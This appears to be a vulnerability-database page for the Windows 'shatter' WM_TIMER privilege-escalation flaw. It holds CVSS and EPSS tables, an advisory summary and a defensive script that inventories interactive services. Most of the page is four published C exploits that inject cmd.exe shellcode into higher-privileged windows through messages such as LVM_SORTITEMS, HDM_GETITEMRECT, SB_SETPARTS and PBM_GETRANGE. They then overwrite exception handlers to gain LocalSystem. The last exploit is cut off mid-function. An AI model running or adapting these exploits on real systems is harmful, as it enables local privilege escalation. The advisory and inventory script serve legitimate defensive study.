CPE, which stands for Common Platform Enumeration, is a standardized naming system for hardware, software and operating systems. CPE provides a structured naming scheme for uniquely identifying and classifying computer systems, platforms and software packages on the basis of attributes such as vendor, product name, version, update, edition and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses at the architecture, design, code or implementation level that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents the common attack patterns adversaries use in cyberattacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
NetDDE Agent on Windows NT 4.0, 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code as LocalSystem via "shatter" style attack by sending a WM_COPYDATA message followed by a WM_TIMER message, as demonstrated by GetAd, aka "Flaw in Windows WM_TIMER Message Handling Could Enable Privilege Elevation."
CVE information
Metrics
Version | Score | Severity | CVSS vector | Source
V2 | 4.6 | – | AV:L/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.
Date | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17)
2022-02-06 | – | – | 4.46% | – | –
2022-03-20 | – | – | 4.46% | – | –
2022-04-03 | – | – | 4.46% | – | –
2022-07-17 | – | – | 4.46% | – | –
2023-03-12 | – | – | – | 0.04% | –
2023-08-13 | – | – | – | 0.04% | –
2023-09-17 | – | – | – | 0.04% | –
2023-12-03 | – | – | – | 0.04% | –
2024-03-24 | – | – | – | 0.04% | –
2024-04-21 | – | – | – | 0.04% | –
2024-06-02 | – | – | – | 0.04% | –
2024-07-07 | – | – | – | 0.04% | –
2024-08-04 | – | – | – | 0.04% | –
2024-08-11 | – | – | – | 0.04% | –
2024-09-22 | – | – | – | 0.04% | –
2024-10-13 | – | – | – | 0.04% | –
2024-12-15 | – | – | – | 0.04% | –
2024-12-22 | – | – | – | 0.27% | –
2025-01-12 | – | – | – | 0.27% | –
2025-02-16 | – | – | – | 0.28% | –
2025-03-16 | – | – | – | 0.28% | –
2025-01-19 | – | – | – | 0.27% | –
2025-02-16 | – | – | – | 0.28% | –
2025-03-18 | – | – | – | – | 0.48%
2025-03-30 | – | – | – | – | 0.59%
2025-04-15 | – | – | – | – | 0.59%
2025-04-15 | – | – | – | – | 0.59%
EPSS percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare a CVE's EPSS score against those of other CVEs.
Publication date: 2002-08-05 22:00 +00:00 Author: sectroyer EDB Verified: Yes
// source: https://www.securityfocus.com/bid/5408/info
A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges.
** Microsoft has released a statement regarding this issue. Please see the References section for details.
A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner.
Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls.
Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details.
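The advisory's precondition is a higher-privileged process that owns a window on the attacker's desktop, and its own example of such a process is an antivirus service running as LocalSystem. On Windows a service only gets a window on the interactive desktop when its Type value carries the SERVICE_INTERACTIVE_PROCESS bit (0x100, "Allow service to interact with desktop"), so a defender can inventory exposure from the Services registry key. The script below is an added example, not code from the advisory or from any of the exploits on this page: it parses the text that `reg query HKLM\SYSTEM\CurrentControlSet\Services /s` prints and lists every interactive Win32 service with the account it runs as. The service names in the embedded sample are constructed, and the assumption that a missing ObjectName means LocalSystem follows the Service Control Manager's documented default.

```python
"""List interactive Win32 services (SERVICE_INTERACTIVE_PROCESS set in Type).

Added example, not code from the advisory or the exploits on this page.
Input is the output of `reg query HKLM\SYSTEM\CurrentControlSet\Services /s`
saved to a file on the host under review; with no argument the constructed
sample below is used.
"""
import re
import sys

SERVICE_WIN32_OWN_PROCESS = 0x10
SERVICE_WIN32_SHARE_PROCESS = 0x20
SERVICE_INTERACTIVE_PROCESS = 0x100

# A service key line has no indentation; deeper sub-keys (...\Foo\Parameters) are skipped.
_SERVICE_KEY_RE = re.compile(
    r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\\]+)$", re.IGNORECASE)
# A value line is indented: name, REG_* type, data (reg query separates them with spaces).
_VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s*(.*)$")

# Constructed sample in reg query's own layout; every service name here is invented.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleAV
    Type    REG_DWORD    0x110
    ImagePath    REG_EXPAND_SZ    C:\Program Files\ExampleAV\avsvc.exe
    ObjectName    REG_SZ    LocalSystem

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleAV\Parameters
    Verbose    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleLegacy
    Type    REG_DWORD    0x110
    ImagePath    REG_EXPAND_SZ    C:\legacy\agent.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleNet
    Type    REG_DWORD    0x20
    ObjectName    REG_SZ    NT AUTHORITY\LocalService

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleTray
    Type    REG_DWORD    0x110
    ObjectName    REG_SZ    NT AUTHORITY\NetworkService

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleDisk
    Type    REG_DWORD    0x1
"""


def parse_reg_query(text):
    """Return {service_name: {value_name: data}} from reg query /s output."""
    services = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        key = _SERVICE_KEY_RE.match(line)
        if key:
            current = key.group(1)
            services.setdefault(current, {})
            continue
        if line.upper().startswith("HKEY_"):
            current = None      # a deeper sub-key; its values are not the service's own
            continue
        value = _VALUE_RE.match(line)
        if value and current is not None:
            name, _reg_type, data = value.groups()
            services[current][name] = data.strip()
    return services


def service_account(values):
    # The Service Control Manager treats a missing ObjectName as LocalSystem.
    return values.get("ObjectName") or "LocalSystem"


def runs_as_system(account):
    return account.lower() in ("localsystem", ".\\localsystem", "nt authority\\system")


def find_interactive_services(services):
    """List (name, account, is_localsystem) for every interactive Win32 service."""
    findings = []
    for name, values in services.items():
        try:
            svc_type = int(values.get("Type", "0"), 16)   # reg query prints DWORDs as 0x...
        except ValueError:
            continue
        if not svc_type & (SERVICE_WIN32_OWN_PROCESS | SERVICE_WIN32_SHARE_PROCESS):
            continue                                      # drivers cannot own windows
        if svc_type & SERVICE_INTERACTIVE_PROCESS:
            account = service_account(values)
            findings.append((name, account, runs_as_system(account)))
    return sorted(findings)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REG_QUERY
    for name, account, is_system in find_interactive_services(parse_reg_query(text)):
        risk = "HIGH: LocalSystem window on the user desktop" if is_system else "review"
        print("%-16s %-32s %s" % (name, account, risk))
```

Every hit is a process whose windows share a desktop with lower-privileged users, which is exactly the situation the advisory describes; the LocalSystem entries are the ones to move to a non-interactive service type or a less privileged account first.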
//---------------------------UtlExp.c------------------------------
/******************************************************************
 * sectroyer
 * Random Intruders
 *
 * The exploit uses two shatter vulnerabilities to cause
 * the execution of code. The first option isn't universal
 * but the two others should work with any Win2k in any
 * language (of course on condition that you set
 * the correct main window title).
 *
 * sectroyer@go2.pl
 *
 *******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <commctrl.h>

#define NOP 0x90
#define UEF long(__stdcall*)(_EXCEPTION_POINTERS*)

// Local Cmd Shellcode
unsigned char exec[] =
    "\x55"          // push ebp
    "\x8b\xec"      // mov ebp, esp
    "\x33\xc0"      // xor eax, eax
    "\x50"          // push eax            (NUL terminator for the string)
    "\x68.exe"      // push '.exe'
    "\x68 cmd"      // push ' cmd'
    "\x40"          // inc eax             (1 = SW_SHOWNORMAL)
    "\x50"          // push eax            (uCmdShow)
    "\x8d\x45\xF5"  // lea eax, [ebp-0xb]  -> "cmd.exe"
    "\x50"          // push eax            (lpCmdLine)
    "\xb8XXXX"      // mov eax, XXXX       -> WinExec()
    "\xff\xd0"      // call eax
    "\x33\xf6"      // xor esi, esi
    "\x4e"          // dec esi
    "\x50"          // push eax            (uExitCode; 0x50 is push eax, not push esi)
    "\xb8YYYY"      // mov eax, YYYY       -> ExitProcess()
    "\xff\xd0"      // call eax
    "\x5d"          // pop ebp
    "\x5d"          // pop ebp
    "\x5d"          // pop ebp
    "\x5d"          // pop ebp
    "\xC3";         // ret

unsigned char buf[2048];
long hLVControl, hHdrControl, t = 0;
char *tWindow;
char tWindowEn[] = "Utility Manager";     // The name of the main window (English)
char tWindowPl[] = "Menedżer narzędzi";   // The name of the main window (Polish)
long sehHandler = 0x12345678;             // Critical Address To Overwrite
long shellcodeaddr = 0x7FFDE060;          // Known Writeable Space Or Global Space

long FindUnhandledExceptionFilter();
void doWrite(long tByte, long address);
void IterateWindows(long hWnd);

int main(int argc, char *argv[])
{
    long hWnd;
    HMODULE hMod;
    PROCESS_INFORMATION pi;
    STARTUPINFO si = { sizeof(STARTUPINFO) };

    printf("Utility Manager Exploit written by sectroyer <sectroyer@go2.pl>\n");
    printf("Usage: %s <language> <option>\n", argv[0]);
    printf("Languages:\n<0> English\n<1> Polish\n");
    printf("Options:\n");
    printf("<0> LVM_SORTITEMS Vulnerability\n");
    printf("<1> HDM_GETITEMRECT using UnhandledExceptionFilter\n");
    printf("<2> HDM_GETITEMRECT using LVM_SORTITEMS Vulnerability\n");
    if (argc != 3)
        return 0;
    if (atoi(argv[2]) < 0 || atoi(argv[2]) > 2)
        return 0;
    if (atoi(argv[1]) < 0 || atoi(argv[1]) > 1)
        return 0;
    if (!atoi(argv[1]))
        tWindow = tWindowEn;
    else
        tWindow = tWindowPl;
    t = atoi(argv[2]);

    // Start Utility Manager so that its window exists
    CreateProcessA(NULL, "utilman.exe /start", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
    Sleep(1000);

    // Find local procedure addresses and patch them into the shellcode
    hMod = LoadLibrary("kernel32.dll");
    *(long*)&exec[(int)(strstr((char*)exec, "XXXX") - (char*)exec)] = (long)GetProcAddress(hMod, "WinExec");
    *(long*)&exec[(int)(strstr((char*)exec, "YYYY") - (char*)exec)] = (long)GetProcAddress(hMod, "ExitProcess");

    printf("[+] Finding %s Window...\n", tWindow);
    hWnd = (long)FindWindow(NULL, tWindow);
    if (hWnd == NULL)
    {
        printf("[-] Couldn't Find %s Window\n", tWindow);
        return 0;
    }
    printf("[+] Found Main Window At...0x%xh\n", hWnd);
    IterateWindows(hWnd);
    printf("[-] Not Done...\n");
    return 0;
}

void doWrite(long tByte, long address)
{
    // LVM_SETCOLUMNWIDTH stores the byte; HDM_GETITEMRECT writes it out to address
    SendMessage((HWND)hLVControl, (UINT)LVM_SETCOLUMNWIDTH, 0, MAKELPARAM(tByte, 0));
    SendMessage((HWND)hHdrControl, (UINT)HDM_GETITEMRECT, 1, (LPARAM)address);
}

long FindUnhandledExceptionFilter()
{
    long *pos;
    void *hLib;
    hLib = LoadLibraryA("kernel32.dll");
    pos = (long*)hLib;
    // Set three distinct marker values and scan kernel32 for the slot that follows them
    SetUnhandledExceptionFilter((UEF)0xA1A2A3A4);
    __try
    {
        while (1)
        {
            if (*pos == 0xA1A2A3A4)
            {
                SetUnhandledExceptionFilter((UEF)0xB4B3B2B1);
                if (*pos == 0xB4B3B2B1)
                {
                    SetUnhandledExceptionFilter((UEF)0xFADEFADE);
                    if (*pos == 0xFADEFADE)
                        break;
                }
            }
            pos++;
        }
    }
    __except(1)
    {
        return 0;
    }
    return (long)pos;
}

void IterateWindows(long hWnd)
{
    long childhWnd, looper;
    childhWnd = (long)GetNextWindow((HWND)hWnd, GW_CHILD);
    while (childhWnd != NULL)
    {
        IterateWindows(childhWnd);
        childhWnd = (long)GetNextWindow((HWND)childhWnd, GW_HWNDNEXT);
    }
    hLVControl = hWnd;
    hHdrControl = SendMessage((HWND)hLVControl, (UINT)LVM_GETHEADER, 0, 0);
    if (hHdrControl != NULL)
    {
        // Found a Listview Window with a Header
        printf("[+] Found listview window..0x%xh\n", hLVControl);
        if (t != 0)
        {
            printf("[+] Found lvheader window..0x%xh\n", hHdrControl);
            // Inject shellcode to known address
            printf("[+] Sending shellcode to...0x%xh\n", shellcodeaddr);
            for (looper = 0; looper < sizeof(exec); looper++)
                doWrite((long)exec[looper], (shellcodeaddr + looper));
            // Overwrite SEH
            printf("[+] Finding UnhandledExceptionFilter....\n");
            sehHandler = FindUnhandledExceptionFilter();
            printf("[+] Overwriting Top SEH....0x%xh\n", sehHandler);
            doWrite(((shellcodeaddr) & 0xff), sehHandler);
            doWrite(((shellcodeaddr >> 8) & 0xff), sehHandler + 1);
            doWrite(((shellcodeaddr >> 16) & 0xff), sehHandler + 2);
            doWrite(((shellcodeaddr >> 24) & 0xff), sehHandler + 3);
        }
        if (t == 0)
        {
            COPYDATASTRUCT cds;
            printf("[+] LVM_SORTITEMS Vulnerability\n");
            memset(buf, NOP, sizeof(buf));
            memcpy(buf + 700, exec, sizeof(exec) - 1);
            cds.cbData = 1000;
            cds.dwData = 0;
            cds.lpData = buf;
            SendMessage((HWND)hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
            SendMessage((HWND)hLVControl, LVM_SORTITEMS, 1, 0x007efd04);
            printf("[+] Done...\n");
        }
        else if (t == 1)
        {
            printf("[+] HDM_GETITEMRECT Using UnhandledExceptionFilter\n");
            SendMessage((HWND)hHdrControl, (UINT)HDM_GETITEMRECT, 0, 1);
            printf("[+] Done...\n");
        }
        else if (t == 2)
        {
            printf("[+] HDM_GETITEMRECT Using LVM_SORTITEMS Vulnerability\n");
            SendMessage((HWND)hLVControl, (UINT)LVM_SORTITEMS, 1, shellcodeaddr);
            printf("[+] Done...\n");
        }
        exit(0);
    }
}
Publication date: 2002-08-05 22:00 +00:00 Author: Oliver Lavery EDB Verified: Yes
/**********************************************************
 * CommCtrl 6.0 Button Shatter attack
 *
 * Demonstrates the use of windows messages to;
 * - inject shellcode to known location
 * - overwrite 4 bytes of a critical memory address
 *
 * 4 Variables need to be set for proper execution.
 * - tWindow is the title of the programs main window
 * - SEH_HANDLER_ADDR is the critical address to overwrite
 * - SHELLCODE_ADDR is the data space to inject the code
 * - KERN32_BASE_ADDR is the base address of kernel32 on your system
 *
 * Oliver Lavery <olavery at pivx.com>
 *
 * Based on (and pretty much identical to) shatterseh2.c by
 * Brett Moore [ brett moore security-assessment com ]
 **********************************************************/
#define _WIN32_WINNT 0x501   // needed for the BCM_* button messages in commctrl.h
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Local Cmd Shellcode.
// Added a loadLibrary call to make sure msvcrt.dll is present -- ol
BYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC";

char g_classNameBuf[256];
char tWindow[] = "Calculator";                // The name of the main window
#define SEH_HANDLER_ADDR 0x77ed73B4           // Critical Address To Overwrite
// you might want to find a less destructive spot to stick the code, but this works for me --ol
#define SHELLCODE_ADDR 0x77ed7484             // Known Writeable Space Or Global Space
// The range between these will be scanned to find our shellcode bytes.
#define KERN32_BASE_ADDR (BYTE *)0x77e61000   // Start of kernel32
#define KERN32_TOP_ADDR (BYTE *)0x77ed0000    // Not the actual top. Just where we stop looking for bytes.

void doWrite(HWND hWnd, BYTE tByte, BYTE *address);
void IterateWindows(long hWnd);
void *FindByteInKernel32(BYTE byte);

void ErrorTrace(const char *msg, DWORD error)
{
    DWORD numWritten;
    WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), msg, strlen(msg), &numWritten, NULL);
    if (error) {
        LPTSTR lpMsgBuf;
        FormatMessage(
            FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
            NULL,
            error,
            MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
            (LPTSTR)&lpMsgBuf,
            0,
            NULL
        );
        WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), lpMsgBuf, strlen(lpMsgBuf), &numWritten, NULL);
        // Free the buffer.
        LocalFree(lpMsgBuf);
    }
}

//"Should there be a reason to believe that code that comes from a variety
//of people, unknown from around the world, should be somehow of higher quality
//than that from people who get paid to do it professionally?"
// - Steve Ballmer
// (Hey, wait, are MS employees generally household names?
// Isn't MS an equal opportunity employer?)

int main(int argc, char *argv[])
{
    long hWnd;
    HMODULE hMod;
    DWORD ProcAddr;
    printf("%% Playing with CommCtrl 6.0 messages\n");
    printf("%% Oliver Lavery.\n\n");
    printf("%% based on Shatter SEH code by\n");
    printf("%% brett moore security-assessment com\n\n");
    // Find local procedure address
    hMod = LoadLibrary("kernel32.dll");
    ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA");
    if (ProcAddr != 0)
        // And put it in our shellcode
        *(long *)&exploit[13] = ProcAddr;
    hMod = LoadLibrary("msvcrt.dll");
    ProcAddr = (DWORD)GetProcAddress(hMod, "system");
    if (ProcAddr != 0)
        // And put it in our shellcode
        *(long *)&exploit[26] = ProcAddr;
    printf("+ Finding %s Window...\n", tWindow);
    hWnd = (long)FindWindow(NULL, tWindow);
    if (hWnd == NULL)
    {
        printf("+ Couldn't Find %s Window\n", tWindow);
        return 0;
    }
    printf("+ Found Main Window At...0x%xh\n", hWnd);
    IterateWindows(hWnd);
    printf("+ Not Done...\n");
    return 0;
}

void *FindByteInKernel32(BYTE byte)
{
    BYTE *addr = KERN32_BASE_ADDR;
    while (addr < KERN32_TOP_ADDR) {
        if (*addr == byte) return addr;
        addr++;
    }
    ErrorTrace("Couldn't find a shellcode byte in kernel32. Sorry.", 0);
    exit(0);
}

//"Should there be any reason to believe that a relatively small group of
//paid programmers working under the direction of a marketing machine can produce
//code approaching the quality of a global team linked by the internet, whose
//every line of code is subject to ruthless peer review, and whose only standard
//is excellence?"
// - crunchie812

void doWrite(HWND hWnd, BYTE tByte, BYTE *address)
{
    void *byte_addr;
    // Point the margin at a kernel32 byte with the wanted value, then have the
    // control copy it to the target address
    byte_addr = FindByteInKernel32(tByte);
    SendMessage(hWnd, (UINT)BCM_SETTEXTMARGIN, 0, (LPARAM)byte_addr);
    if (!SendMessage(hWnd, (UINT)BCM_GETTEXTMARGIN, 0, (LPARAM)address)) {
        ErrorTrace("error", GetLastError());
    }
}

void IterateWindows(long hWnd)
{
    long childhWnd, looper;
    childhWnd = (long)GetNextWindow((HWND)hWnd, GW_CHILD);
    GetClassName((HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf));
    while (strcmp(g_classNameBuf, "Button"))
    {
        // IterateWindows(childhWnd);
        childhWnd = (long)GetNextWindow((HWND)childhWnd, GW_HWNDNEXT);
        GetClassName((HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf));
    }
    if (childhWnd != NULL)
    {
        printf("+ Found button control..0x%xh\n", childhWnd);
        // Inject shellcode to known address
        printf("+ Sending shellcode to...0x%xh\n", SHELLCODE_ADDR);
        for (looper = 0; looper < sizeof(exploit); looper++)
            doWrite((HWND)childhWnd, exploit[looper], (BYTE *)(SHELLCODE_ADDR + looper));
        // Overwrite SEH
        printf("+ Overwriting Top SEH....0x%xh\n", SEH_HANDLER_ADDR);
        doWrite((HWND)childhWnd, ((SHELLCODE_ADDR) & 0xff), (BYTE *)SEH_HANDLER_ADDR);
        doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 8) & 0xff), (BYTE *)SEH_HANDLER_ADDR + 1);
        doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 16) & 0xff), (BYTE *)SEH_HANDLER_ADDR + 2);
        doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 24) & 0xff), (BYTE *)SEH_HANDLER_ADDR + 3);
        // Cause exception
        printf("+ Forcing Unhandled Exception\n");
        doWrite((HWND)childhWnd, 1, (BYTE *)0xDEADBEEF);
        printf("+ Done...\n");
        exit(0);
    }
}
Publication date: 2002-08-05 22:00 +00:00 Author: Brett Moore EDB Verified: Yes
/*************************************************************************************
 * Statusbar Control Shatter exploit
 *
 * Demonstrates the use of a combination of windows messages to;
 * - brute force a useable heap address
 * - place structure information inside a process
 * - inject shellcode to known location
 * - overwrite 4 bytes of a critical memory address
 *
 * 4 Variables need to be set for proper execution.
 * - tWindow is the title of the programs main window
 * - sehHandler is the critical address to overwrite
 * - shellcodeaddr is the data space to inject the code
 * - heapaddr is the base heap address to start brute forcing
 *
 * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues
 * Try it out against any program with a progress bar
 *
 *************************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Local No Null Cmd Shellcode.
BYTE exploit[] = "\x90\x33\xc9\x66\xb9\x36\x32\xc1\xe1\x09\x66\xb9\x63\x6d\x51\x54\xbb\x5c\x21\x9d\x77\x03\xd9\xff\xd3\xcc\x90";

char g_classNameBuf[256];
char tWindow[] = "Main Window Title";    // The name of the main window
long sehHandler = 0x7cXXXXXX;            // Critical Address To Overwrite
long shellcodeaddr = 0x7fXXXXXX;         // Known Writeable Space Or Global Space
unsigned long heapaddr = 0x00500000;     // Base Heap Address
long mainhWnd;

void doWrite(HWND hWnd, long tByte, long address);
void BruteForceHeap(HWND hWnd);
void IterateWindows(long hWnd);

int main(int argc, char *argv[])
{
    printf("%% Playing with status bar messages\n");
    printf("%% brett.moore@security-assessment.com\n\n");
    if (argc == 2)
        sscanf(argv[1], "%lx", &heapaddr); // Oddity
    printf("%% Using base heap address...0x%xh\n", heapaddr);
    printf("+ Finding %s Window...\n", tWindow);
    mainhWnd = (long)FindWindow(NULL, tWindow);
    if (mainhWnd == NULL)
    {
        printf("+ Couldn't Find %s Window\n", tWindow);
        return 0;
    }
    printf("+ Found Main Window At......0x%xh\n", mainhWnd);
    IterateWindows(mainhWnd);
    printf("+ Done...\n");
    return 0;
}

// Signature matches the prototype above (the original defined extra, unused parameters)
void BruteForceHeap(HWND hWnd)
{
    long retval;
    BOOL foundHeap = FALSE;
    char buffer[5000];
    memset(buffer, 0, sizeof(buffer));
    while (!foundHeap)
    {
        printf("+ Trying Heap Address.......0x%xh ", heapaddr);
        memset(buffer, 0x58, sizeof(buffer) - 1);
        // Set Window Title
        SendMessage((HWND)mainhWnd, (UINT)WM_SETTEXT, 0, (LPARAM)buffer);
        // Set Part Contents
        SendMessage(hWnd, (UINT)SB_SETTEXT, 0, (LPARAM)heapaddr);
        retval = SendMessage(hWnd, (UINT)SB_GETTEXTLENGTH, 0, 0);
        printf("%d", retval);
        if (retval == 1)
        {
            // First Retval should be 1
            memset(buffer, 0x80, sizeof(buffer) - 1);
            // Set Window Title
            SendMessage((HWND)mainhWnd, (UINT)WM_SETTEXT, 0, (LPARAM)buffer);
            // Set Part Contents
            SendMessage(hWnd, (UINT)SB_SETTEXT, 0, (LPARAM)heapaddr);
            retval = SendMessage(hWnd, (UINT)SB_GETTEXTLENGTH, 0, 0);
            if (retval > 1)
            {
                // Second should be larger than 1
                printf(" : %d - Found Heap Address\n", retval);
                return;
            }
        }
        printf("\n");
        heapaddr += 2500;
    }
}

void doWrite(HWND hWnd, long tByte, long address)
{
    char buffer[5000];
    memset(buffer, 0, sizeof(buffer));
    memset(buffer, tByte, sizeof(buffer) - 1);
    // Set Window Title
    SendMessage((HWND)mainhWnd, (UINT)WM_SETTEXT, 0, (LPARAM)buffer);
    // Set Statusbar width
    SendMessage(hWnd, (UINT)SB_SETPARTS, 1, (LPARAM)heapaddr);
    SendMessage(hWnd, (UINT)SB_GETPARTS, 1, (LPARAM)address);
}

void IterateWindows(long hWnd)
{
    long childhWnd, looper;
    childhWnd = (long)GetNextWindow((HWND)hWnd, GW_CHILD);
    while (childhWnd != NULL)
    {
        IterateWindows(childhWnd);
        childhWnd = (long)GetNextWindow((HWND)childhWnd, GW_HWNDNEXT);
    }
    GetClassName((HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf));
    if (strcmp(g_classNameBuf, "msctls_statusbar32") == 0)
    {
        // Find Heap Address
        BruteForceHeap((HWND)hWnd);
        // Inject shellcode to known address
        printf("+ Sending shellcode to......0x%xh\n", shellcodeaddr);
        for (looper = 0; looper < sizeof(exploit); looper++)
            doWrite((HWND)hWnd, (long)exploit[looper], (shellcodeaddr + looper));
        // Overwrite SEH
        printf("+ Overwriting Top SEH.......0x%xh\n", sehHandler);
        doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff), sehHandler);
        doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff), sehHandler + 1);
        doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff), sehHandler + 2);
        doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff), sehHandler + 3);
        // Cause exception
        printf("+ Forcing Unhandled Exception\n");
        SendMessage((HWND)hWnd, (UINT)SB_GETPARTS, 1, 1);
        printf("+ Done...\n");
        exit(0);
    }
}
Publication date: 2002-08-05 22:00 +00:00 Author: Brett Moore EDB Verified: Yes
/***************************************************************************
 * Progress Control Shatter exploit
 *
 * Demonstrates the use of Progress Control messages to;
 * - inject shellcode to known location
 * - overwrite 4 bytes of a critical memory address
 *
 * 3 Variables need to be set for proper execution.
 * - tWindow is the title of the programs main window
 * - sehHandler is the critical address to overwrite
 * - shellcodeaddr is the data space to inject the code
 *
 * Local shellcode loads relevant addresses
 * Try it out against any program with a progress bar
 *
 * Based on (and pretty much identical to)
 * mcafee-shatterseh2.c by
 * Oliver Lavery <oliver.lavery at sympatico.ca>
 ***************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Local Cmd Shellcode.
BYTE exploit[] =
    "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC";

char g_classNameBuf[256];
char tWindow[] = "Checking Disk C:\\";   // The name of the main window
long sehHandler = 0x7fXXXXXX;            // Critical Address To Overwrite
long shellcodeaddr = 0x7fXXXXXX;         // Known Writeable Space Or Global Space

void doWrite(HWND hWnd, long tByte, long address);
void IterateWindows(long hWnd);

int main(int argc, char *argv[])
{
    long hWnd;
    HMODULE hMod;
    DWORD ProcAddr;
    printf("%% Playing with progress bar messages\n");
    printf("%% brett.moore@security-assessment.com\n\n");
    // Find local procedure address
    hMod = LoadLibrary("kernel32.dll");
    ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA");
    if (ProcAddr != 0)
        // And put it in our shellcode
        *(long *)&exploit[13] = ProcAddr;
    hMod = LoadLibrary("msvcrt.dll");
    ProcAddr = (DWORD)GetProcAddress(hMod, "system");
    if (ProcAddr != 0)
        // And put it in our shellcode
        *(long *)&exploit[26] = ProcAddr;
    printf("+ Finding %s Window...\n", tWindow);
    hWnd = (long)FindWindow(NULL, tWindow);
    if (hWnd == NULL)
    {
        printf("+ Couldn't Find %s Window\n", tWindow);
        return 0;
    }
    printf("+ Found Main Window At...0x%xh\n", hWnd);
    IterateWindows(hWnd);
    printf("+ Done...\n");
    return 0;
}

void doWrite(HWND hWnd, long tByte, long address)
{
    // PBM_SETRANGE stores the byte as the low range value; PBM_GETRANGE writes it to address
    SendMessage(hWnd, (UINT)PBM_SETRANGE, 0, MAKELPARAM(tByte, 20));
    SendMessage(hWnd, (UINT)PBM_GETRANGE, 1, (LPARAM)address);
}

void IterateWindows(long hWnd)
{
    long childhWnd, looper;
    childhWnd = (long)GetNextWindow((HWND)hWnd, GW_CHILD);
    while (childhWnd != NULL)
    {
        IterateWindows(childhWnd);
        childhWnd = (long)GetNextWindow((HWND)childhWnd, GW_HWNDNEXT);
    }
    GetClassName((HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf));
    if (strcmp(g_classNameBuf, "msctls_progress32") == 0)
    {
        // Inject shellcode to known address
        printf("+ Sending shellcode to...0x%xh\n", shellcodeaddr);
        for (looper = 0; looper < sizeof(exploit); looper++)
            doWrite((HWND)hWnd, (long)exploit[looper], (shellcodeaddr + looper));
        // Overwrite SEH
        printf("+ Overwriting Top SEH....0x%xh\n", sehHandler);
        doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff), sehHandler);
        doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff), sehHandler + 1);
        doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff), sehHandler + 2);
        doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff), sehHandler + 3);
        // Cause exception
